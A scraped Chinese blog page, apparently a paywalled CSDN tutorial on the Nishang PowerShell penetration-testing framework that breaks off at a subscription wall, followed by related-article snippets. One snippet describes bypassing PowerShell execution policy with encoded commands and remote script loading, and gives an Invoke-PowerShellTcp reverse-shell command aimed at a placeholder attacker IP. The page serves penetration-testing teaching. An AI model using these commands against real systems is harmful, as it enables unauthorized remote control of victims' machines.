使用Nishang进行PowerShell渗透测试

最新推荐文章于 2025-07-05 16:35:11 发布
最新推荐文章于 2025-07-05 16:35:11 发布
阅读量180 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: git 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XvrgMatlab/article/details/133865935
安全 专栏收录该内容
87 篇文章 ¥59.90 ¥99.00
订阅专栏
Nishang是一款强大的PowerShell渗透测试工具,包含多种用于红队操作的脚本和函数。本文介绍了Nishang的下载、安装、导入方法,并展示了如ReverseShell、Invoke-PsUACme等实用脚本的示例,强调在使用过程中需遵循法律和道德准则。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Nishang是一款功能强大的PowerShell渗透测试工具,它提供了一系列用于渗透测试和红队操作的PowerShell脚本和函数。本文将介绍如何使用Nishang进行PowerShell渗透测试,并提供相应的源代码示例。

  1. 下载和安装Nishang

首先,我们需要下载和安装Nishang工具集。你可以从Nishang的GitHub存储库中获取最新版本的代码。将存储库克隆到本地或直接下载ZIP文件并解压缩。

  1. 导入Nishang模块

打开PowerShell控制台,并导航到你解压或克隆Nishang存储库的位置。进入Nishang目录,你将看到一些子目录和文件。要导入Nishang模块,执行以下命令:

Import-Module .\Nishang.psm1
  1. 使用Nishang脚本

现在,你可以开始使用Nishang提供的各种功能了。下面是一些常用的Nishang脚本示例:

  • ReverseShell:这个脚本可以与远程主机建立反向Shell连接。

                

                
                
        

    

    
  


        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
            

        


    



                



	

		

			

				
					
PowerShell渗透工具Nishang的用法

				
			

			

				

					谢公子的博客
				

				

					01-14
					
					3229
					
				

			

		

		

			
				
目录

Nishang

Nishang的目录结构

Nishang使用

Invoke-Decode.ps1



Nishang

Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本...

			
		

	



                

            
              



	

		

			

				
					
PowerShell渗透工具Nishang使用方法及编程实例

				
			

			

				

					LogicGuruX的博客
				

				

					08-13
					
					250
					
				

			

		

		

			
				
Nishang是一款功能强大的PowerShell渗透测试工具集,提供了多个模块和脚本,可用于执行各种安全评估和攻击任务。本文介绍了Nishang的基本使用方法,并提供了一些常见的编程实例,帮助读者更好地理解和应用该工具集。在使用Nishang进行渗透测试时,请务必遵守法律和道德准则,并只在授权和合规的环境下使用

			
		

	



              


  
              

                


	

		

			

				
					
Powershell---Nishang工具简介

				
			

			

				

					weixin_43679009的博客
				

				

					12-01
					
					1528
					
				

			

		

		

			
				
PowershellNishang工具简介


Nishang简介及安装
 Nishang是一款针对Powershell渗透工具。他基于Powershell渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试是的各个阶段。



Nishang的安装
  下载地址
Nishang要在Powershell  3.0以上的环境中才可以正常使用,也就是说在Windows7下默认是有点小问题的,因为win7下自带的环境是PowerSh

			
		

	





	

		

			

				
					
探索渗透测试的新维度:Nishang 框架

				
			

			

				

					gitblog_00085的博客
				

				

					05-11
					
					282
					
				

			

		

		

			
				
探索渗透测试的新维度:Nishang 框架

    
        
            nishang
            samratashok/nishang: Nishang是一个基于PowerShell安全工具集合,主要用于渗透测试和红队操作。它包含了多个模块,可用于信息收集、权限提升、后门植入、凭证获取等多种恶意活动,帮助安全专家评估Windows系统安全性。
     ...

			
		

	



		

			
		



	

		

			

				
					
Nishang工具的介绍和基本使用

				
			

			

				

					菜鸟-宇的个人博客
				

				

					10-03
					
					258
					
				

			

		

		

			
				
是一个脚本和有效负载的框架和集合,支持使用PowerShell进行攻击性安全渗透测试和红色团队。Nishang集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本在渗透测试的所有阶段都很有用。

			
		

	





	

		

			

				
					
基础篇:内网工具Nishang PowerShell

				
			

			

				

					qq_60115503的博客
				

				

					04-12
					
					1955
					
				

			

		

		

			
				
Nishang介绍
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段

			
		

	





	

		

			

				
					
nishang, Nishang PowerShell测试和攻击性安全.zip

				
			

			

				

					09-18
				

			

		

		

			
				
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。... 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前PowerShell会话( PowerShel

			
		

	





	

		

			

				
					
公众号和小程序的java源码-nishang:Nishang-用于渗透测试和攻击性安全PowerShell。https://github.c

				
			

			

				

					06-06
				

			

		

		

			
				
进行攻击性安全渗透测试和红队。 Nishang渗透测试的所有阶段都很有用。 经过 用法 导入当前 PowerShell 会话中的所有脚本(PowerShell v3 以上)。 PS C:\nishang> 导入模块 .\nishang.psm1 使用带有点源的单个...

			
		

	





	

		

			

				
					
基于powershell渗透测试工具nishang

				
			

			

				

					AmyBaby00的博客
				

				

					11-22
					
					684
					
				

			

		

		

			
				
本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》
Nishang是一款针对PowerShell渗透工具。
先到github上去下载nishang,并解压
目标机下载nishang 地址:https://github.com/samratashok/nishang
攻击机下载icmpsh 地址:git clone https:...

			
		

	





	

		

			

				
					
PowerShell渗透工具Nishang使用和编程

				
			

			

				

					PixelDyno的博客
				

				

					09-18
					
					144
					
				

			

		

		

			
				
Nishang是一个功能强大的PowerShell渗透工具集,它提供了一系列的脚本和模块,用于在渗透测试和红队操作中执行各种任务。本文将介绍Nishang的用法,并提供一些实例代码来演示其功能。首先,我们需要从NishangGitHub存储库中获取最新版本的代码。可以使用Git工具克隆存储库,或者直接下载ZIP压缩文件。
下载完成后,将Nishang文件夹复制到你的PowerShell脚本目录中。在使用Nishang之前,我们需要加载所需的模块。可以使用PowerShell的Import-Module命令

			
		

	





	

		

			

				
					
PowerShell渗透工具Nishang

				
			

			

				

					weixin_44110913的博客
				

				

					08-02
					
					616
					
				

			

		

		

			
				
目录
Nishang
Nishang的目录结构
Nishang使用
Invoke-Decode.ps1

Nishang
Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Ni...

			
		

	





	

		

			

				
					
Final——Nishang

				
			

			

				

					weixin_33928467的博客
				

				

					06-23
					
					353
					
				

			

		

		

			
				
一、介绍

Nishang是基于PowerShell渗透测试专用工具,它集成了框架、脚本和各种payload,被广泛应用于渗透测试的各个阶段。

二、使用

下载脚本工具:Nishang
Nishang需要我们的Powershell版本在v3以上才能使用。

查看当前Powershell版本:get-host


进入相应目录下
导入框架:Import-Module .\nishang.psm1...

			
		

	





	

		

			

				
					
PowerShell攻击工具Nishang实战

				
			

			

				

					悦分享
				

				

					10-03
					
					331
					
				

			

		

		

			
				
渗透测试中,PowerShell是不能忽略的一个环节,而且仍在不断地更新和发展,它具有令人难以置信的灵活性和功能化管理Windows系统的能力。一旦攻击者可以在一台计算机上运行代码,就会下载PowerShell脚本文件(.ps1)到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行。这些特点使得PowerShell在获得和保持对系统的访问权限时,成为攻击者首选的攻击手段,利用PowerShell的诸多特点,攻击者可以持续攻击而不被轻易发现。

			
		

	





	

		

			

				
					
细说——Nishang

				
			

			

				

					LainWith的博客
				

				

					09-27
					
					925
					
				

			

		

		

			
				
介绍
Powershell用于渗透测试其实早在多年前就已经被提出了,利用Powershell,攻击者可以在无需接触磁盘的情况下执行命令等,并且相较已经被大家广泛关注并防御的cmd而言,Powershell并非那么的引人瞩目。Nishang是基于PowerShell渗透测试专用工具。它集成了框架、脚本和各种payload,能够帮助渗透测试人员在对Windows目标的全过程检测中使用,项目地址:https://github.com/samratashok/nishang
​
【基于隐私,以及实验效果,我会在虚

			
		

	





	

		

			

				
					
nishang脚本的使用

				
			

			

				

					qq_63501912的博客
				

				

					02-06
					
					1641
					
				

			

		

		

			
				
nishang脚本的常规用法

			
		

	





	

		

			

				
					
PowerShell攻防进阶篇:nishang工具用法详解

				
			

			

				

					weixin_33795806的博客
				

				

					09-14
					
					1010
					
				

			

		

		

			
				
本文讲的是PowerShell攻防进阶篇:nishang工具用法详解,

1.简介
Nishang是一款针对PowerShell渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好...

			
		

	





	

		

			

				
					
[内网信息收集] 内网信息收集 —— 内网端口扫描技术

				
			

			

				

					Blue17 の 小窝
				

				

					03-01
					
					864
					
				

			

		

		

			
				
PowerSploit 是一款基于 PowerShell 的后渗透框架软件,包含了很多 PowerShell 的攻击脚本,它们主要用于渗透中的信息侦测,权限提升,权限维持等。它为用户提供了在本地计算机上完成远程主机工作的能力。本章笔者将介绍几个常见的内网端口扫描工具,并介绍其基本用法,起到一个抛砖引玉的作用,至于具体的工具学习,笔者后续在精进的时候会把笔记补充上来的。通过查询内网主机的端口开放信息,我们不仅可以了解到目标主机开放的服务,还可以找出其开放服务的漏洞,顺便还能分析目标出目标网络的拓扑结构等。

			
		

	





	

		

			

				
					
一些值得收藏的PowerShell工具

				
			

			

				

					月光轩辕的专栏
				

				

					12-02
					
					2967
					
				

			

		

		

			
				
转自http://www.freebuf.com/tools/87647.html




本文旨在分享部分PowerShell工具,仅供安全学习,禁止非法利用。

UnmanagedPowerShell :https://github.com/leechristensen/UnmanagedPowerShell

可以从一个非托管程序来执行PowerShell , 经过一些修改

			
		

	





	

		

			

				
					
windows安装stable diffusion

					
最新发布

				
			

			

				

					奔跑的狮子
				

				

					07-05
					
					135
					
				

			

		

		

			
				
git网址:https://github.com/AUTOMATIC1111/stable-diffusion-webui。双击webui.bat会自动安装python依赖库(前提需要有python,建议python 3.10版本)创建一个文件夹,clone下来stable diffusion webui。

			
		

	





	

		

			

				
					
powershell技术渗透测试

				
			

			

				

					12-28
				

			

		

		

			
				
### PowerShell 渗透测试教程和技巧

#### 使用场景与优势
PowerShell 是一种强大的命令行工具,不仅能够执行常规的任务自动化工作,还被广泛应用于安全研究领域。由于其内置的功能以及可以访问 .NET 类库的能力,在渗透测试方面提供了极大的灵活性[^4]。

#### 绕过执行策略的方法
为了有效利用 PowerShell 进行渗透测试活动,绕过目标机器上设置的安全措施是非常重要的一步。有多种方法可用于规避常见的 `Execution Policy` 限制,例如通过使用 `-EncodedCommand` 参数传递 Base64 编码后的脚本内容;或者借助 WMI 和 COM 对象来加载并运行远程下载的 PS1 文件而不触发本地磁盘写入行为[^3]。

#### 实战案例:建立反向 Shell
一个经典的例子就是创建一个持久化的反向 TCP shell 来获取对受害者主机更深层次的控制权。这可以通过调用特定函数实现,比如 `Invoke-PowerShellTcp` 函数中的参数配置指定攻击者的 IP 地址及监听端口号完成连接请求发送过程[^5]:
```powershell
Invoke-PowerShellTcp -Reverse -IPAddress "攻击机IP" -Port 端口号
```

#### 学习资源推荐
对于希望深入学习如何运用 PowerShell 开展实际项目的研究人员来说,《Nishang》是一个非常好的开源框架,其中包含了大量高质量且实用性强的小型模块化脚本供参考借鉴。这些代码片段覆盖了从信息收集到权限提升等多个环节的操作指南[^2]。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值